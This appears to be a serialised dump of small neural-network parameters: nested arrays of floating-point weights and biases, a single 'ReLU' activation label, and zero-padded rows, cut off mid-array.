[-1.20489, 0.00499474, 0.00224722, -0.0788109, -0.531097], [0.0341653, -0.75784, -1.16271, 0.138826, -0.108376], [-2.00863, -0.183904, -0.0266509, 0.102098, 0.152136], [-0.0176994, -1.64635, 1.87141, -0.045419, 0.335076], [0.139941, -1.85992, 0.400993, -0.156754, -0.739956], [0.115651, 0.0259321, -0.249902, 0.321394, -0.961429], [-0.00640331, 0.0338228, 0.020067, -0.746619, -1.01117], [-0.0205555, 0.0238262, -0.00710481, 0.00993486, -0.00195851], [-0.774547, -0.0511929, -0.0952544, -0.107889, -0.0713629], [0.00214213, -0.0107202, -0.0193541, -1.04431, -1.19396], [-1.17989, 0.0129286, 0.00463964, -0.425268, -0.289161], [-0.0214634, 0.00214001, -0.0190182, -0.0456416, 1.1099], [-0.029243, -1.56354, 1.30367, 0.0297061, -0.320085], [0.0197814, 0.201381, 0.605706, -0.468032, 0.497662], [-0.506525, -0.62106, 0.626484, 0.275208, -0.431391], [0.0531451, -0.186863, -0.126187, -0.313901, -0.104601], [-0.0630314, -0.076252, 0.330454, -0.0740661, -1.5834], [-0.733682, 0.0412771, -0.446468, -0.00970908, 0.331554], [-1.46362, -0.0669328, 0.746043, 0.140668, 0.0382584], [-0.14939, 1.03969, -1.33554, 0.273186, -0.498295], [-0.304713, -0.0379349, -0.164071, -1.19174, 0.079117], [-1.71237, 0.0157772, 0.0198623, 0.146487, -0.267808], [0.0259492, -1.18695, -0.0298402, 0.165567, -0.159584], [-0.021579, 0.341542, 0.452558, -0.231205, 0.0440514], [-1.9631, 0.154049, 0.0137692, 0.0817737, -0.125252], [-0.0219194, -0.00243167, 0.00803058, 0.0047772, 0.0064134], [-0.0501559, 0.276345, -0.381865, -0.501957, -1.4581], [0.298677, 2.1332, -0.6261, 0.185432, -0.248539], [-1.38707, -0.00757278, -0.132848, -0.114998, -0.0878607], [-0.02055, 0.2476, -0.2217, -1.47, -0.522], [0.711, 0.04468, 0.2103, 0.0633, -0.1364], [-0.0283, 0.00491, 1.688, 0.0657, -0.0454], [0.087, 0.001502, 0.0159, -0.6353, -1.426], [-0.0754, 0.1732, -0.384, -0.319, 0.0246], [0.06195, -1.528, 0.0067, 0.04468, -0.0896], [0.0588, -0.1329, 0.1611, -0.0641, -1.274], [-0.00567, -0.0994, -0.03546, -1.1, 0.614], [-0.462, -0.09784, 0.1133, -0.428, 0.2136], [0.05093, 1.241, -1.2295, -0.06903, 0.4958], [-0.006153, 0.004818, 1.173, 0.061, -0.04794], [-0.1848, 1.246, 1.665, 0.6724, -0.3044], [-1.587, 0.0386, -0.04623, -0.2434, 0.1755], [0.0493, 0.725, 0.1354, -0.8447, -0.0425], [0.05603, -0.1092, -0.00854, -0.562, -1.462], [-0.003819, -0.2456, 0.3752, -0.214, -1.63], [-0.02715, 1.097, 0.692, 0.00494, -0.0365], [0.05014, 0.010254, -0.0061, -1.253, -0.715], [-0.000966, -0.05792, 0.1118, 0.636, -0.9673], [0.2053, 0.1002, -0.11615, -0.5312, -1.165], [-0.0014, -0.118, 0.0987, -1.43, -0.5967], [-1.205, 0.004993, 0.002247, -0.0788, -0.5312], [0.03418, -0.758, -1.163, 0.1388, -0.1084], [-2.008, -0.184, -0.02666, 0.1021, 0.1521], [-0.0177, -1.646, 1.871, -0.0454, 0.335], [0.1399, -1.86, 0.401, -0.1567, -0.7397], [0.11566, 0.02592, -0.2499, 0.3213, -0.9614], [-0.006405, 0.0338, 0.02007, -0.7466, -1.011], [-0.02055, 0.02382, -0.007103, 0.00993, -0.001959], [-0.7744, -0.05118, -0.0953, -0.1079, -0.07135], [0.002142, -0.01072, -0.01935, -1.044, -1.194], [-1.18, 0.01293, 0.00464, -0.4253, -0.289], [-0.02147, 0.00214, -0.01901, -0.04565, 1.11], [-0.02924, -1.563, 1.304, 0.02971, -0.32], [0.01978, 0.2014, 0.6055, -0.468, 0.4976], [-0.5063, -0.621, 0.6265, 0.2751, -0.4314], [0.05313, -0.1869, -0.1262, -0.314, -0.1046], [-0.06305, -0.07623, 0.3306, -0.07404, -1.583], [-0.734, 0.0413, -0.4465, -0.00971, 0.3315], [-1.464, -0.06696, 0.746, 0.1406, 0.03827], [-0.1494, 1.04, -1.336, 0.2732, -0.4983], [-0.3047, -0.03793, -0.1641, -1.191, 0.0791], [-1.712, 0.01578, 0.01987, 0.1465, -0.2678], [0.02596, -1.187, -0.02985, 0.1655, -0.1595], [-0.02158, 0.3416, 0.4526, -0.2312, 0.04404], [-1.963, 0.154, 0.01377, 0.0818, -0.1252], [-0.02193, -0.002432, 0.00803, 0.004776, 0.006413], [-0.05017, 0.2764, -0.3818, -0.502, -1.458], [0.2986, 2.133, -0.626, 0.1854, -0.2485], [-1.387, -0.007572, -0.1328, -0.115, -0.0879]]
[-0.421252, 0.24803, 0.0664654, -0.744869, -0.0409261, 0.0138727, -0.258448, -0.0856601, -0.106106, -0.276391, 0.200527, -0.129985, -0.432665, -0.358543, -0.665139, -0.166964, -0.292224, -0.725142, 0.165481, -0.621433, -0.61701, -0.563115, 0.0451245, -0.362211, -0.127283, -0.289099, 0.140683, -0.116706, -0.0303211, 0.00203918, -0.979589, -0.559148, 0.183829, 0.0359596, 0.0331432, -0.0563382, 0.112215, -0.610066, -0.133693, -0.389712, 0.229969, -0.514067, -0.486847, 0.0692628, 0.0478197, -0.367712, -0.0180491, -0.563606, 0.0282498, -0.209655, -0.4211, 0.248, 0.06647, -0.7446, -0.04092, 0.01387, -0.2585, -0.08563, -0.1061, -0.2764, 0.2006, -0.13, -0.4326, -0.3586, -0.665, -0.167, -0.2922, -0.725, 0.1655, -0.6216, -0.617, -0.563, 0.04514, -0.3623, -0.1273, -0.289, 0.1406, -0.1167, -0.03032, 0.002039, -0.9795, -0.559, 0.1838, 0.03595, 0.03314, -0.05634, 0.11224, -0.61, -0.1337, -0.3896, 0.23, -0.514, -0.4868, 0.0693, 0.04782, -0.3677, -0.01805, -0.5635, 0.02824, -0.2096]
ReLU
[[-0.190802, -0.00758437, -0.0920271, 1.09324, 0.317222, -2.37381, 0.234736, -0.13727, 0.63011, 1.4454, -0.116976, -0.134363, -0.449532, -0.833038, 0.673238, 0.196814, -0.149231, 0.630408, -0.00305633, 0.747228, -0.0279406, 0.805203, 0.321111, 0.370958, 0.419294, 0.0775577, -0.468713, -0.251091, -0.00977363, 0.596266, 2.35509, 1.07718, -0.675094, -0.11155, -1.05279, 0.486709, -0.0539065, 0.83709, 0.171526, 0.54523, -0.192565, 1.03262, 0.153308, -1.15418, -0.0428594, 0.312743, 0.0443241, 0.0286834, -0.797369, 0.472735, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.880953, -1.62702, -0.652086, -0.351992, 0.378622, -0.0769754, 0.210195, 0.191709, 0.107091, -0.0713066, 0.605431, 0.400752, 0.94048, 0.0522567, -1.0887, -0.355845, -0.223769, 1.1169, -0.718492, 1.13499, -0.278796, 0.551892, 0.495525, 0.571399, -0.24201, 0.100507, -1.18619, 0.0880787, -0.0289095, 0.0509083, 1.83171, 0.6862, -0.39929, 0.114441, 0.889684, -0.0490691, -0.566421, -0.57235, 0.143374, -1.14329, -0.728916, 0.0586127, 0.743539, 0.167517, 0.802824, 0.949741, -0.0249468, 0.285229, -0.168877, 0.62642, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.223809, 1.73253, -0.333675, 0.099225, 0.129259, 0.505276, 0.118743, -0.0811119, -0.2675, 0.157231, 0.333774, 0.168241, -0.500814, -0.0716592, 0.174983, -0.0192222, -0.141102, 0.714263, -0.873274, -0.323866, -0.0762606, -0.582453, -0.420127, 0.0748219, -0.0944211, 0.133654, 0.531037, 0.155852, -0.0457821, -1.47148, -0.19564, -0.900291, -0.241527, 0.03827, -0.241427, -0.643028, 0.869941, -0.891437, -0.314241, 0.449545, 0.0876528, 0.0415615, -0.196312, 0.181724, 0.170896, -0.683005, -0.0181579, 0.284871, -0.0542546, -1.10351, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.14518, 0.0818213, -0.225119, 1.17954, -0.90843, -0.0702841, 0.974185, 2.05023, 0.256359, 0.521352, -0.18215, 0.0185395, 0.295377, 0.807731, -1.57681, -1.34927, -0.0419784, 1.1522, -0.165635, -0.543042, 0.854822, 0.152768, -0.253338, 0.0880828, -0.465364, 0.197129, 0.62888, 1.27953, 0.00389209, 0.329963, -3.23497, -0.428656, -0.350389, 0.850962, 0.951346, 0.012416, 0.50271, 1.38659, -0.227507, -0.155618, 0.874422, 0.971363, 0.0988053, -0.317474, 0.10135, -0.0312873, -0.0167854, 0.915046, -0.276131, -0.151493, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.586365, -0.0125228, 0.340055, 1.76193, -0.488093, -0.570386, 0.287412, -0.0531648, 0.118813, -0.624788, 0.97593, 0.0559254, -0.225465, -0.412086, -1.09812, -0.27209, 0.831464, 1.17618, -0.254836, -0.762673, -0.83506, -1.05776, -0.933027, 0.105781, -0.257661, -0.375572, 0.172253, 0.518861, -0.00604989, -0.120287, 0.58444, 0.365653, -0.139513, -1.03574, -0.319755, -0.133227, -0.1512, -0.0735516, -0.24897, 0.125951, 0.16578, -0.136545, -0.439206, -0.508392, -0.0218843, -0.228847, 0.0378875, 0.0250818, 1.51312, -0.237713, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.45547, 0.00346024, -0.595265, 0.514149, -0.413331, 0.0062681, 0.339499, -0.459038, 0.173837, -0.125554, 0.521886, 0.301428, 0.3989, 0.216619, 0.912058, -0.847605, -0.300187, 0.500257, -0.126847, -0.905694, 1.42402, -0.00573388, 0.35436, -0.142974, -0.641151, 0.29777, 0.358672, 0.884687, 0.0123819, -0.0282268, -1.53491, -0.135031, 0.588786, -0.782166, 0.156146, -0.434115, 1.29452, -3.63568, 0.258365, -0.208532, -0.773367, -0.223863, -0.201964, -0.95394, -0.0600814, -0.390557, 0.00967142, -0.620447, -0.151373, 0.0589998, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.138294, -0.0713555, -1.17633, -0.316026, 0.150722, 0.0461899, -0.338576, -0.174497, 0.284251, -0.190334, -1.29619, 0.108382, 0.146606, -0.190855, 0.282111, -0.0173808, 0.720767, -0.428999, -0.218419, -0.262456, 0.184826, -0.706586, 0.202993, -0.0022203, -0.422308, 0.509199, -0.00798663, 0.07551, 0.0248856, -0.103669, 0.364173, 0.641305, 0.462768, -0.206061, -0.880251, -0.0921624, 0.0414831, -2.06763, 0.0255998, -0.877493, 0.113112, 0.129349, 0.492856, 0.108522, -0.17548, 0.15049, -0.00117929, -0.089728, -0.409479, -0.0722953, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.507594, -0.0514999, 0.552249, -1.41839, 0.0553786, 0.532326, 0.164535, -0.0977133, -0.526348, -1.25539, -1.1896, 0.0702711, -0.231412, -0.283693, 0.581987, -0.0437625, 1.0682, 0.767292, -0.652843, 0.0172681, 0.557888, 0.515318, 0.870824, -0.0481142, -0.756185, -0.869735, 0.372673, 0.186523, 0.00375031, 0.192652, -3.38056, 0.129031, 0.362547, -0.389943, 1.48598, -0.108194, -0.400056, -0.493318, 0.153324, -0.124801, -1.1367, -0.296325, -0.0315782, 0.923442, 1.07506, 0.187128, -0.0263081, -1.3092, -0.299209, 0.185622, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.266464, -0.122096, 0.0219648, -1.07045, -0.136862, -0.0489383, 1.23135, -0.33214, 0.0968364, -0.127091, -0.316545, -0.0644938, 0.132866, 0.47323, 0.756255, 0.35432, 0.0368466, 0.891473, -0.977332, -0.911899, 0.148429, -1.06048, -0.127875, 0.0542686, 0.287741, 0.0512203, -0.675597, -0.780057, 0.0291947, 0.0261419, 0.434535, 0.941041, -1.5446, 0.0637777, -0.121769, -0.276515, 0.716986, 0.141397, -0.155097, 0.0301562, 0.0250848, 0.362314, -0.355492, -0.172818, 0.401601, -0.287012, 0.0253213, 0.71056, -0.143598, 0.145539, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.668069, -0.64937, 0.406658, -0.889944, -1.32305, 1.06248, 0.79558, -1.81257, -1.62818, -2.08995, 0.298561, -0.552885, -1.82267, -0.547442, 0.721016, 0.793254, 0.606734, -0.230722, 0.00117912, 1.15487, -0.209082, -0.564108, -0.21581, -0.17971, 0.0655516, 0.208879, -0.954159, -0.483194, -0.00343854, 0.246842, 1.69629, 2.227, -1.66662, -0.43812, -0.234226, -0.358203, -1.35676, 0.21259, -0.417905, -0.749533, 0.0430135, -2.26856, 2.14624, 0.811786, -1.50414, -0.201517, -0.0300535, 0.253204, 1.28052, 0.231715, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.675616, -0.0230078, -0.892309, 0.195386, -0.555112, 0.258192, -0.540221, -0.459557, 0.245615, 1.30105, -0.1587, 0.183754, -0.061843, -0.0952268, 0.434325, -0.471016, -0.151857, 1.58238, 0.196877, 1.85387, -0.320607, 0.557267, -0.0609182, -0.0588986, -0.677041, 0.341294, -0.23116, 0.666366, 0.00458047, -0.078292, -0.786694, 0.980184, 0.803159, 0.574715, -0.124391, 0.448125, 0.524148, -0.889563, 0.0916526, 0.0712049, -0.817497, -0.158341, -0.645128, -0.342665, 0.654033, -0.085302, 0.0430531, -0.416267, -0.343646, 0.214224, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0501221, 0.060854, -0.637635, 0.017068, 0.0787262, -0.106261, 0.379029, 0.445583, 0.154545, 0.117457, -1.05865, -0.33458, 0.224615, -0.258844, -0.792872, -0.317685, -0.498715, 0.584523, -0.280805, -0.219326, 0.352946, 0.103119, 0.899889, -0.0138282, -0.316447, 0.216854, -0.629176, 0.0895064, -0.0285921, -0.48096, 0.115354, -0.255346, -0.46165, 0.0640028, 0.916662, 0.212014, -0.0516598, 0.258601, 0.279114, -0.00376369, -0.423447, -0.092829, 0.0353234, -0.11531, 0.616939, -0.25572, 0.012723, -0.197993, 0.0465763, -0.454985, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.208623, 0.0680264, 0.0302068, 0.895312, 0.66498, 0.430488, -1.26986, -0.295672, 0.324519, 0.619809, 0.547991, -0.296623, -0.687372, -0.133778, 0.635782, -0.341594, -0.377277, -0.188609, 1.83977, 0.106085, -0.186324, 1.59226, -0.0991222, -0.0257417, 0.909452, -0.159076, -0.711959, 0.926227, 0.0122387, -0.483696, 1.31829, 0.741946, 0.259898, 0.5944, -1.16722, -0.121421, -0.0820436, 0.204539, 0.428622, 0.593306, 0.842264, -0.439903, -0.685612, -0.13243, -0.204501, 0.185935, -0.0240131, -0.71815, 0.596123, 0.0990866, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.567493, -0.405514, -1.80211, -0.309432, 0.905971, 0.528761, -0.230282, -0.0266546, 0.0720728, 0.931902, -1.39689, -0.293715, 0.299016, -0.628125, 0.222204, -0.222478, -1.23718, 1.63712, 0.302932, -1.34512, 0.568905, 0.491569, 0.0141597, 0.597812, -0.0123975, -0.983078, -0.200736, 0.912883, 0.0071778, -0.168526, -2.06091, 0.940526, -0.665433, -1.0443, -0.475679, 0.916632, 0.587468, 0.460772, 0.0413646, 1.26358, 0.325798, 0.169313, -0.134727, -0.506792, 0.00340328, -0.853717, -0.00138781, -1.00036, 1.28592, -0.0390045, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.207693, 0.0424778, -0.496511, -0.958162, 0.110534, 0.0430363, -0.581582, -0.381683, -0.136716, -0.435406, -0.401493, 0.0507256, -0.124781, -0.0936797, 1.69472, 0.191705, 1.38225, 0.465489, 0.381591, 0.643792, -0.0950129, -0.00530051, 0.397914, -0.0115105, 0.0685479, -0.34888, 0.26638, 0.330644, -0.0452523, 0.124738, 0.0681441, 0.32322, 0.500237, -0.196965, -0.0836244, 0.158894, 0.630903, 0.400042, -0.41153, 0.134731, -0.191008, -1.01422, -0.691875, 1.02128, -0.856139, -0.297604, -0.0178588, -1.16444, -0.484831, 0.141784, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.00818408, -0.0348139, 0.0389273, -0.0199657, -0.0284338, -0.0530231, -0.0443782, 0.0297783, -0.0423825, -0.000883216, -0.0339524, -0.0443599, -0.0414405, -0.025108, 0.00161758, -0.0194437, -0.0301773, -0.00349553, -0.0409724, -0.00391195, 0.0050569, 0.0268362, 0.0143436, -0.0212317, 0.0129942, -0.00186956, -0.00831822, 0.0209765, -0.022076, -0.00014602, -0.0508547, -0.0283406, -0.0420875, -0.024933, 0.0349469, 0.0278358, 0.0231051, -0.0425398, 0.0367179, -0.0183758, -0.050241, 0.0224473, -0.000396286, 0.0144694, -0.0260841, 0.0343676, 0.0125252, 0.0156554, -0.0228026, 0.0124546, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.185604, -0.0295177, 0.667728, 1.29191, 0.00631239, -3.9059, -0.185471, -0.375549, -0.998572, 0.316136, -0.883604, -0.00986804, -0.780975, -0.0124423, -1.26651, 0.546283, -0.311956, 0.273094, -0.211629, -0.586668, 0.307147, 1.57907, -0.64022, 0.0422142, -0.0338828, -0.498055, 0.29554, -0.131524, 0.0200743, 0.11395, 1.43598, 1.86624, 0.0280859, -0.39664, 0.455871, -0.0131438, -0.136247, 0.0942204, 0.898, 0.880547, 0.0700585, -0.411825, 1.41965, -0.125566, 0.272288, 0.252202, 0.00716719, -0.0758884, 0.599989, 0.157278, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-3.26462, 0.0710221, 0.233773, -6.6128, 0.080372, -0.0217208, -0.19433, 0.535023, 0.365539, -2.61957, 0.242974, -0.092644, -0.251485, 0.71084, 1.08206, -1.48036, -0.113148, 1.26828, 0.734797, 2.90208, -0.122521, 0.203373, -0.156238, 0.019531, -0.599339, 0.646111, -2.01284, 1.45973, -0.0291765, 0.108116, -0.00478547, 2.99937, -2.06978, 0.530956, -0.461387, -0.187865, -0.243825, -0.342867, 0.131226, -0.0266605, 0.00765041, -2.48813, -0.475482, -0.0621756, 0.1371, -0.120618, 0.0231615, -0.0838345, -1.66595, 0.24073, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.265591, -0.143651, -0.599815, -0.460085, 1.15738, 0.139611, 0.365107, 0.778169, 0.546343, -0.238748, -0.711035, -0.078982, 0.0284684, 0.0857233, 0.541074, 0.0360264, 0.498843, 1.17904, -0.0748138, 0.246503, -0.396839, 1.44922, -0.16238, -0.381943, -0.585806, 0.807992, -1.45462, -0.300736, 0.0618963, 0.455942, 0.593126, 0.53659, -0.708316, 0.105724, -0.362106, 0.81094, -0.599333, -0.386897, -0.308542, 1.51272, 0.261257, -1.67261, 0.82896, 0.109723, 0.27649, -0.345866, -0.0425323, 0.486706, -0.0473212, 0.70982, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.192668, 0.117958, 0.0165421, 1.53395, 0.328993, -0.245844, 0.872514, 0.628621, 0.104873, -1.19616, 0.337602, 0.175327, 0.514677, -0.339829, -1.22238, -0.313887, -0.15503, -0.529562, -0.0362781, -0.923275, 0.400213, -0.810796, 0.15092, 0.152025, -0.748315, 0.317655, -0.167599, 0.0267164, -0.00731216, -0.194377, -0.131841, 0.0616002, 0.0532725, -1.03357, 0.126388, 0.313202, -0.157074, 0.738003, 0.250175, -0.293995, -0.19065, -0.0491177, -0.264018, 0.027398, -0.0619699, 0.385248, -0.0405702, -0.0923901, -0.379824, 0.107243, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.161734, 0.203872, 0.640685, 1.7027, 0.047434, -0.136723, -0.0510796, 1.43481, 0.64795, -1.07741, 0.460653, 0.752072, 0.170281, -0.149845, -0.821689, 3.51217e-05, 0.76137, 0.0285244, -0.377589, 1.11147, 0.148948, -0.090949, 0.170501, 0.0399197, -1.4668, 0.118909, -0.191517, 0.109912, -0.0374318, 0.0250646, -3.2788, -0.160637, 0.495105, -1.65937, 0.607138, -0.0431666, 0.477297, -0.188691, -0.572719, -0.208499, -0.954885, 1.0546, -0.543787, 0.0534491, 0.200521, 0.127108, -0.0318949, -1.08385, -1.03341, 0.12609, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.188177, -0.411406, -0.896618, -0.703802, 0.240709, -0.599808, -0.508706, -0.422922, 0.553474, -0.361447, -1.44929, -0.0844063, 0.219099, 0.524791, 0.3095, -0.194167, 0.133102, 0.624892, 0.378208, -0.606421, 0.149818, 1.22898, -0.0347799, 0.905147, -0.339347, 0.103059, -0.223631, 0.142914, 0.0493219, 0.147786, 